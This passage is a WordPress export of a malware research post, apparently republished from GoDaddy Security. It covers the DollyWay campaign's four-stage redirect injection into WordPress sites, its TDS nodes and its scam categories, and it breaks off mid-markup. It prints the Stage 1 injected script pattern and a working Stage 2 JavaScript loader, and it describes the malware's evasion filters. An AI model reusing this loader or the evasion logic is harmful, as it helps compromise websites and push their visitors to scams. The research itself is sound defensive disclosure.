{"id":140369,"date":"2025-03-17T20:45:33","date_gmt":"2025-03-17T20:45:33","guid":{"rendered":"https:\/\/peraltafinancing.com\/business\/internet-business\/8-years-of-sophisticated-website-malware\/"},"modified":"2025-03-17T20:45:33","modified_gmt":"2025-03-17T20:45:33","slug":"8-years-of-sophisticated-website-malware","status":"publish","type":"post","link":"https:\/\/fivemor.com\/?p=140369","title":{"rendered":"8 Years of Sophisticated Website Malware"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<h2 id=\"h-key-findings-nbsp\">Key findings\u00a0<\/h2>\n<ul class=\"wp-block-list\">\n<li>GoDaddy Security researchers have uncovered a long-running malware operation dating back to 2016 that has compromised over 20,000 websites globally in the past 8 years. <\/li>\n<li>Campaign infrastructure currently leverages a distributed network of compromised WordPress sites as TDS and Command and Control (C2) nodes.\u00a0<\/li>\n<li>The latest campaign (DollyWay) demonstrates sophisticated capabilities including cryptographically signed data transfers, heterogeneous injection methods, and automatic reinfection mechanisms.\u00a0<\/li>\n<li>Threat actors attempt to maintain control of compromised sites by removing any competing malware and updating WordPress.\u00a0\u00a0<\/li>\n<\/ul>\n<h2 id=\"h-overview-nbsp\">Overview\u00a0<\/h2>\n<p>GoDaddy Security researchers have uncovered evidence linking multiple malware campaigns into a single, long-running operation we&#8217;ve named &#8220;DollyWay World Domination&#8221;. While previously thought to be separate campaigns, our research reveals these attacks share common infrastructure, code patterns, and monetization methods &#8211; all appearing to be connected to a single sophisticated threat actor. The operation was named after the following tell-tale string, which is found in some variations of the malware: <strong>define(<\/strong>&#8216;<strong>DOLLY_WAY&#8217;, <\/strong>&#8216;<strong>World Domination<\/strong>&#8216;<strong>);<\/strong>.\u00a0\u00a0<\/p>\n<p>Through extensive analysis spanning eight years of data, we\u2019ve connected seemingly disparate campaigns including Master134, Fake Browser Updates, and CountsTDS into a comprehensive operational timeline. The current iteration, which we track as DollyWay v3, primarily targets visitors of infected WordPress sites via injected redirect scripts that employ a distributed network of Traffic Direction System (TDS ) nodes hosted on compromised websites. These scripts redirect site visitors to various scam pages through traffic broker networks associated with <a data-eid=\"publishing.library.dollyway-world-domination.external.link.click\" data-wpel-link=\"external\" rel=\"noreferrer noopener nofollow\" target=\"_blank\" href=\"https:\/\/www.infoblox.com\/threat-intel\/threat-actors\/vextrio\/\">VexTrio<\/a>, one of the largest known cybercriminal affiliate networks that leverages sophisticated DNS techniques, traffic distribution systems, and domain generation algorithms to deliver malware and scams across global networks. While current monetization relies heavily on redirects, historical campaigns from this actor included more aggressive payloads like ransomware and banking trojans.\u00a0<\/p>\n<p>The operation comprises several distinct campaigns known by different names in the security community:\u00a0<\/p>\n<p>The latest variant of DollyWay malware demonstrates significant sophistication, employing multiple layers of obfuscation, cryptographic verification of malicious payloads, and reinfection mechanisms. \u00a0<\/p>\n<h2 id=\"h-dollyway-massive-scale-and-ongoing-evolution-nbsp\">DollyWay: Massive scale and ongoing evolution\u00a0<\/h2>\n<p>The DollyWay malware works exclusively on WordPress sites. Leveraging a distributed network of C2 and TDS nodes hosted on compromised sites, it redirects site visitors to VexTrio\/LosPollos links. Historically, this operation has also used AdsTerra, PropellerAds and some other ad networks to monetize traffic from compromised sites.\u00a0<\/p>\n<p>This campaign is known for its sophisticated ways of infecting websites:\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>Cryptographically signed data transfers\u00a0<\/li>\n<li>Heterogeneous injection spread across files and database\u00a0<\/li>\n<li>Automatic reinfection mechanisms\u00a0<\/li>\n<li>Removal of competing third-party malware\u00a0<\/li>\n<li>WordPress updates and site repairs\u00a0<\/li>\n<\/ul>\n<p>As of February 2025, we have seen over <strong>10,<\/strong><strong>0<\/strong><strong>00<\/strong> unique infected WordPress sites worldwide generating around <strong>10 million<\/strong> impressions of web pages with injected malicious scripts for millions of visitors with unique IP addresses every month.\u00a0<\/p>\n<h2 id=\"h-technical-analysis-of-current-campaign-dollyway-v3-nbsp\">Technical analysis of current campaign (DollyWay v3)\u00a0<\/h2>\n<p>In this post, we will refer to the ongoing malicious campaign as <strong>DollyWay v3<\/strong>. Version 3 uses <strong>wp-content\/counts.php<\/strong> scripts on select compromised sites as C2\/TDS, while previous versions of DollyWay malware used different file names.\u00a0\u00a0<\/p>\n<h3 id=\"h-redirect-script-injections-nbsp\">Redirect script injections\u00a0<\/h3>\n<p>DollyWay v3 employs a sophisticated four-stage injection chain designed to evade detection. \u00a0<\/p>\n<h4 id=\"h-stage-1-initial-injection-nbsp\">Stage 1: Initial injection\u00a0<\/h4>\n<p>The first stage leverages WordPress&#8217;s <strong>wp_enqueue_script<\/strong> function to append a link to a dynamically generated script loading from the site&#8217;s main URL whenever someone visits an infected domain. Each injection includes a unique 32-character hexadecimal parameter \u2014 an MD5 hash that serves as a site identifier and is different for each infected site. \u00a0<\/p>\n<p>From now on, we\u2019ll refer to the initial hexadecimal string as hex32&gt; and its derivatives as <strong>md5(hex32)<\/strong>, <strong>md5(md5(hex32))<\/strong> and so on, depending on how many times <strong>md5<\/strong> function was applied.\u00a0<\/p>\n<p>The pattern for the Stage 1 injection is:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"white-space:pre-wrap;color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"><span style=\"color:#ff8906; \"><span style=\"color:#e66170; font-weight:bold; \">script<\/span> src<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#00c4c4; \">\"https:\/\/<infected-site>\/?<md5>&amp;ver=<wordpress version=\"\">\"<\/wordpress><\/md5><\/infected-site><\/span> id<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#00c4c4; \">\"<md5>-js\"<\/md5><\/span><span style=\"color:#ff8906; \">&gt;<\/span><span style=\"color:#ff8906; \"\/><span style=\"color:#e66170; font-weight:bold; \">script<\/span><span style=\"color:#ff8906; \">&gt;<\/span>\u00a0<\/span><\/span><\/pre>\n<\/div>\n<p>Example with a redacted domain of an infected site:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"white-space:pre-wrap;color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"><span style=\"color:#ff8906; \"><span style=\"color:#e66170; font-weight:bold; \">script<\/span> src<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#00c4c4; \">\"https:\/\/[redacted]\/?ccb2d976143fb8616e62575fafebccbb&amp;ver=6.6.1\"<\/span> id<span style=\"color:#d2cd86; \">=<\/span><span style=\"color:#00c4c4; \">\"ccb2d976143fb8616e62575fafebccbb-js\"<\/span><span style=\"color:#ff8906; \">&gt;<\/span><span style=\"color:#ff8906; \"\/><span style=\"color:#e66170; font-weight:bold; \">script<\/span><span style=\"color:#ff8906; \">&gt;<\/span>\u00a0<\/span><\/span><\/pre>\n<\/div>\n<p>The goal is to inject a generic looking script that will leave security scanners that only do static analysis of the HTML code with very little information and hide the real malicious activity in the dynamically generated subsequent stages of the injections.\u00a0<\/p>\n<h4 id=\"h-stage-2-dynamic-loading-and-referrer-collection-nbsp\">Stage 2: Dynamic loading and referrer collection\u00a0<\/h4>\n<p>Since the URL in the Stage 1 script is not a static .js file, the WordPress engine is used to generate its contents. The DollyWay malware detects that the md5(hexh32)&gt; parameter is present in the requested URL and hijacks the response generation, producing JavaScript code like this:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"\/><span class=\"line_wrapper\"><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">function<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#b060b0; background:#281800; \">{<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">var<\/span><span style=\"color:#ffffff; background:#281800; \"> ref<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202f<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">var<\/span><span style=\"color:#ffffff; background:#281800; \"> po <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> document<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">createElement<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#00c4c4; background:#281800; \">'script'<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202fpo<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">type<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#00c4c4; background:#281800; \">'text\/javascript'<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202fpo<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">async <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#0f4d75; background:#281800; \">true<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202f<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">if<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#ffffff; background:#281800; \">document<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">referrer<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">length <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#008c00; background:#281800; \">0<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#b060b0; background:#281800; \">{<\/span><span style=\"color:#ffffff; background:#281800; \">ref <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#00c4c4; background:#281800; \">'undefined'<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#b060b0; background:#281800; \">}<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">else<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#b060b0; background:#281800; \">{<\/span><span style=\"color:#ffffff; background:#281800; \">ref <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> document<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">referrer<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#b060b0; background:#281800; \">}<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">      po<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">src <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#00c4c4; background:#281800; \">'?<md5>&amp;'<\/md5><\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#d2cd86; background:#281800; \">+<\/span><span style=\"color:#ffffff; background:#281800; \"> Math<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">floor<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#ffffff; background:#281800; \">Math<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">random<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#d2cd86; background:#281800; \">*<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#008c00; background:#281800; \">100000<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#d2cd86; background:#281800; \">+<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#00c4c4; background:#281800; \">'&amp;'<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><span style=\"color:#d2cd86; background:#281800; \">+<\/span><span style=\"color:#ffffff; background:#281800; \"> ref<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202f<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">var<\/span><span style=\"color:#ffffff; background:#281800; \"> s <\/span><span style=\"color:#d2cd86; background:#281800; \">=<\/span><span style=\"color:#ffffff; background:#281800; \"> document<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">getElementsByTagName<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#00c4c4; background:#281800; \">'script'<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#d2cd86; background:#281800; \">[<\/span><span style=\"color:#008c00; background:#281800; \">0<\/span><span style=\"color:#d2cd86; background:#281800; \">]<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f\u202f\u202fs<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#ffffff; background:#281800; \">parentNode<\/span><span style=\"color:#d2cd86; background:#281800; \">.<\/span><span style=\"color:#e66170; background:#281800; font-weight:bold; \">insertBefore<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#ffffff; background:#281800; \">po<\/span><span style=\"color:#d2cd86; background:#281800; \">,<\/span><span style=\"color:#ffffff; background:#281800; \"> s<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"><span style=\"color:#ffffff; background:#281800; \">\u202f\u202f\u202f\u202f<\/span><span style=\"color:#b060b0; background:#281800; \">}<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#d2cd86; background:#281800; \">(<\/span><span style=\"color:#d2cd86; background:#281800; \">)<\/span><span style=\"color:#b060b0; background:#281800; \">;<\/span><span style=\"color:#ffffff; background:#281800; \"> <\/span><\/span>\n<span class=\"line_wrapper\"\/><\/pre>\n<\/div>\n<p>At this point, the malware can still evade some static analysis tools that load links found in the HTML code of the page. So, the goal of Stage 2 is to block static analysis scanners completely and start collecting information that may be used by a TDS while not revealing the malicious behavior.\u00a0<\/p>\n<p>To accomplish this, the Stage 2 script dynamically loads the Stage 3 script from the \/?<strong><md5\/><\/strong> URL on the same site, passing the referrer as an additional parameter along with a random number probably added to divert attention.\u00a0<br \/>\u00a0<br \/>The URLs of the generated Stage 3 scripts look like this:\u00a0<\/p>\n<div>\n<pre class=\"code_syntax\" style=\"white-space:pre-wrap;color:#d1d1d1;background:#000000;\"><span class=\"line_wrapper\"><span style=\"color:#e34adc; \">https:<\/span><span style=\"color:#9999a9; \">\/\/[redacted]\/?39c67aeb2992af8278ec16172137e422&amp;77947&amp;<\/span><span style=\"color:#6070ec; \">https:\/\/www.google.com\/<\/span><span style=\"color:#9999a9; \">\u00a0<\/span><\/span><\/pre>\n<\/div>\n<h4 id=\"h-stage-3-tds-script-injection-nbsp\">Stage 3: TDS script injection\u00a0<\/h4>\n<p>Since static analysis scanners can\u2019t also easily discover the Stage 3 scripts, this is where the real malicious behavior begins. To further evade detection, the malware performs some additional server-side filtering as shown below:\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"dollyway  malware performs some additional server-side filtering\" loading=\"lazy\" width=\"1154\" height=\"192\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-17.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>This means that the Stage 3 script will not be generated for:<\/p>\n<ul class=\"wp-block-list\">\n<li>WordPress users that are currently logged in\u00a0\u00a0<\/li>\n<li>Known bots (the malware maintains its own list of around 102 different bot User-Agent strings)\u00a0<\/li>\n<li>Any visitors that come from localhost \u00a0<\/li>\n<li>Visitors that don\u2019t have a referrer (Stage 2 script set to \u201cundefined\u201d)\u00a0<\/li>\n<\/ul>\n<p>For those who don\u2019t fall into the above criteria,\u00a0 the malware generates a script that tries to dynamically load the Stage 4 scripts from 3 random nodes (third-party infected sites). The malware stores a list of current nodes along with other malware settings encoded as a WordPress option in the <strong>wp_options<\/strong> table.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image is-style-default size-full\"><img alt=\"malware stores a list of current nodes  in wp_options\" loading=\"lazy\" width=\"1398\" height=\"848\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>These nodes act as TDS (traffic direction system) and use the <strong>\/wp-content\/counts.php<\/strong> path in their URLs to return scripts that start the malicious redirect chain. Later, we will show how the nodes also act as C2 servers, providing the malware on infected sites with the most up-to-date set of settings.\u00a0<\/p>\n<h3 id=\"h-tds-nodes-and-tds-script-urls-nbsp\">TDS nodes and TDS script URLs\u00a0<\/h3>\n<p>The TDS URLs contain two extra parameters <strong>?cat<\/strong> and <strong>&amp;t<\/strong>. The <strong><cat\/><\/strong> is an integer number from 0 to 5 that specifies the desired category of VexTrio scam links to be served to the visitor. The category is saved as \u201c<strong>dolly_category<\/strong>\u201d along with other DollyWay settings in the <strong>wp_options<\/strong> table.\u00a0<\/p>\n<ul class=\"wp-block-list\">\n<li>0 &#8211; Dating\u00a0<\/li>\n<li>1 &#8211; Mainstream (Sweepstakes)\u00a0<\/li>\n<li>2 &#8211; Crypto\u00a0<\/li>\n<li>3 &#8211; Gay Dating\u00a0<\/li>\n<li>4 &#8211; Gambling\u00a0<\/li>\n<li>5 &#8211; Cams\u00a0<\/li>\n<\/ul>\n<p>DollyWay v3 most frequently uses the Dating (0) and the Mainstream (1) categories.\u00a0<\/p>\n<p>The use of three different nodes at the same time can be explained by their desire to ensure the visitor gets redirected, even if some of the nodes are taken down. Remember, the nodes are also compromised WordPress sites, and the attack operators don\u2019t fully control them and can\u2019t guarantee their uptime.\u00a0<\/p>\n<p>To improve chances that some of the nodes are functional, DollyWay maintains a list of C2\/TDS nodes that they store in the settings and update them once a day. The list currently consists of 14 nodes and the Stage 3 script randomly picks three of them every time it is triggered.\u00a0<\/p>\n<h4 id=\"h-stage-4-the-redirect-nbsp\">Stage 4: The redirect\u00a0<\/h4>\n<p>The Stage 4 scripts returned by the TDS node is where the actual redirect code can be found. \u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"stage 4 scripts returned by the TDS node\" loading=\"lazy\" width=\"1476\" height=\"516\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image-12.png?size=3840x0\"\/><\/figure>\n<\/div>\n<p>All the nodes typically return the exact same script. To avoid multiple redirects, the malware saves the \u201c<strong>test<\/strong>\u201d and the \u201c<strong>click4<\/strong>\u201d parameters (in Nov 2024, changed to \u201ctest01\u201d and \u201cclick01\u201d respectively) in the browser&#8217;s local storage whenever a visitor gets redirected to a scam site.\u00a0<\/p>\n<p>The redirect only occurs if these storage parameters are not found and when a visitor clicks anywhere on a web page.\u00a0<\/p>\n<p>The redirects consistently go to VexTrio\/LosPollos links with the u=<strong>7mkpd0d<\/strong> parameter (affiliate user id in the LosPollos system). The <strong>&amp;o<\/strong> parameter changes depending on the category specified in the TDS URL For example, <strong>ex3wmkx<\/strong> corresponds to the <strong>\u201cDating (0)\u201d <\/strong>category and is specific to this LosPollos user only.\u00a0<\/p>\n<p>Each category also has a predefined VexTrio domain name saved on each C2\/TDS node.\u00a0<\/p>\n<p>After Stage 4, VexTrio\/LosPollos control the redirect chain. Usually, site visitors end up on their scam pages. Sometimes the final landing page will be a Google Play page for some legitimate application like Tinder, TikTok, Instagram, that probably buys downstream traffic from LosPollos or when their TDS decides that they are not interested in the visitor.\u00a0<\/p>\n<div class=\"wp-block-image__wrapper\">\n<figure class=\"wp-block-image size-full\"><img alt=\"Example of VexTrio\/LosPollos scam landing page served by DollyWay redirects.\" loading=\"lazy\" width=\"1431\" height=\"714\" decoding=\"async\" data-nimg=\"1\" style=\"color:transparent\" sizes=\"auto, (min-width: 1256px) 1200px, calc(100vw - 2.5rem)\" srcset=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=16x0 16w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=32x0 32w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=48x0 48w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=64x0 64w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=96x0 96w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=128x0 128w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=256x0 256w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=392x0 392w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=640x0 640w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=750x0 750w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=828x0 828w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=1080x0 1080w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=1248x0 1248w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=1920x0 1920w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=2048x0 2048w, https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=3840x0 3840w\" src=\"https:\/\/www.godaddy.com\/resources\/wp-content\/uploads\/2025\/03\/image.jpeg?size=3840x0\"\/><figcaption class=\"wp-block-image__caption\"><em>Example of VexTrio\/LosPollos scam landing page served by DollyWay redirects.<\/em>\u00a0<\/figcaption><\/figure>\n<\/div>\n<h3 